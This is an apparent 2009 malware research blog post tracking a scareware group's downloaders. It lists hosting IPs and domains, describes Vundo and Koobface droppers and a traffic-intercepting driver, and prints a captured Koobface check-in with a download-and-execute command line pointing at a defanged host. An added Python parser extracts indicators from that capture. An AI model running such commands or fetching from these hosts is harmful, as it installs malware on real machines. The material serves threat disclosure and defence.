ThreatFire Research Blog

Softwarefortubeview Moves to a New Home at 65.110.50.141

A couple of weeks ago we posted on the continued success of a group distributing FakeAv/Rogueware/Scareware.

Please note that their downloaders have moved to a new home at 65.110.50.141. Multiple domains currently resolve to that IP, which is managed by “Sago Networks”. One we know of that is currently serving softwarefortubeview.40019.exe executables is wile-exe.com. The move appears to have happened on June 1st. Avoid executables from that domain for now.

The downloads appear to be committing some sort of click fraud, although they have also been known to pop fake alerts that push FakeAv software (see here, here and here).

Update (2009.06.09) — we are following the downloaders, and the group moved to another couple of IPs yesterday (2009.06.08), this time 66.197.171.9 and 66.197.171.6. For example, the malware can be found at my-exe-profile. com/softwarefortubeview.45084.exe. The server virtually hosts an array of content, including “Download Now!” links that redirect to paid mp3 services, fetish videos, and more malware.
Also related is my-exe-profile. com/ av-scanner.48047.exe. This dropper/downloader, however, lays out a couple of click-fraud trojans that visit a long list of banner ads and ad sites from the compromised host. A Vundo variant is installed, and an unusually packed Koobface variant is dropped on the machine. Another component, an iehelper.dll BHO, pops a screenful of AntiVirus System PRO, or SWP2009Pro, along with a dialog reading “There are serious threats detected on your computer” and a bogus “Windows Security Alert” reporting “Windows reports that your computer is infected”.

The final, and fairly new, piece is that it downloads pdrv.exe from evidek.ro. The “download and exec” command for this executable is sent down from a Koobface-related channel while more bogus alerts are popping on the system:

The partially mangled Koobface POST and response are listed here:

POST /ld/gen.php
HTTP/1.0
Host: upr15may.com
f=0&a=1956647682&v=09&c=0&s=ld&l=71140&ck=0&c_fb=0&c_ms=0&c_hi=0&c_be=0&c_fr=-1&c_yb=-1&c_tg=0&c_nl=0&c_fu=-1HTTP/1.1

#PID=8000
STARTONCE|hxxp://evidek. ro/1/pdrv.exe
WAIT|120
#BLACKLABEL
EXIT
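
As an added defender's example (not code from the post or from ThreatFire), the following parses the captured check-in body and the command-channel reply shown above into structured fields so the download-and-exec target can be pulled out as an indicator. The handling of '#' directives and of VERB|ARG commands is inferred from this single capture and is an assumption.

```python
from urllib.parse import parse_qsl

# Captured exchange copied from the post; the "HTTP/1.1" fused onto the last body
# field in the mangled capture is dropped, and the URL stays defanged as published.
BEACON_BODY = ("f=0&a=1956647682&v=09&c=0&s=ld&l=71140&ck=0&c_fb=0&c_ms=0"
               "&c_hi=0&c_be=0&c_fr=-1&c_yb=-1&c_tg=0&c_nl=0&c_fu=-1")
RESPONSE = """#PID=8000
STARTONCE|hxxp://evidek. ro/1/pdrv.exe
WAIT|120
#BLACKLABEL
EXIT
"""
# STARTONCE is the "download and exec" verb seen in the capture; extend only from confirmed samples.
EXEC_VERBS = {"STARTONCE"}

def parse_beacon(body: str) -> dict:
    """Split the check-in POST body into its key/value fields."""
    return dict(parse_qsl(body, keep_blank_values=True))

def parse_response(text: str) -> dict:
    """Parse the reply: '#PID=<n>' sets pid, any other '#...' line is kept as a label,
    and VERB|ARG lines are commands; parsing stops at EXIT (format assumed from the capture)."""
    out = {"pid": None, "labels": [], "commands": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            key, _, value = line[1:].partition("=")
            if key == "PID" and value.isdigit():
                out["pid"] = int(value)
            else:
                out["labels"].append(line[1:])
            continue
        verb, _, arg = line.partition("|")
        verb = verb.upper()
        out["commands"].append((verb, arg or None))
        if verb == "EXIT":
            break
    return out

def payload_urls(parsed: dict) -> list:
    """Download targets named by exec-type commands: the indicators worth blocking."""
    return [arg for verb, arg in parsed["commands"] if verb in EXEC_VERBS and arg]

def wait_seconds(parsed: dict) -> int:
    """Total sleep requested by WAIT commands, to estimate the next check-in."""
    return sum(int(arg) for verb, arg in parsed["commands"]
               if verb == "WAIT" and arg and arg.isdigit())
```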

This dropper creates
%ProgramFiles%\podmena\podmena.dll
%ProgramFiles%\podmena\podmena.sys
for which there is virtually no AV detection at this time. As always, don’t forget your behavior-based protection.

The podmena.sys driver is interesting — it attaches to the tcpip device driver and appears to intercept network traffic entering and leaving the system.

This entry was posted on Wednesday, June 3rd, 2009 at 10:12 am and is filed under FakeAlert, Rogueware.
